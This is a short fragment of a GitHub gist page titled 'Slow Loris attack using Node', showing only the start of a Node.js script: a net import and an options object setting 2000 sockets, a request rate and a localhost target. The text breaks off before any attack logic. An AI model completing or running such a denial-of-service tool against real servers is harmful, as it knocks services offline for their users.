Skip to content

Instantly share code, notes, and snippets.

@ambalabanov
ambalabanov / index.js
Created April 28, 2020 16:11 — forked from mehulmpt/index.js
Slow Loris attack using Node
const net = require('net')
const opts = {
host: 'localhost',
port: 1234,
sockets: 2000,
respawn: false,
rate: 600,
method: 'GET',
path: '/'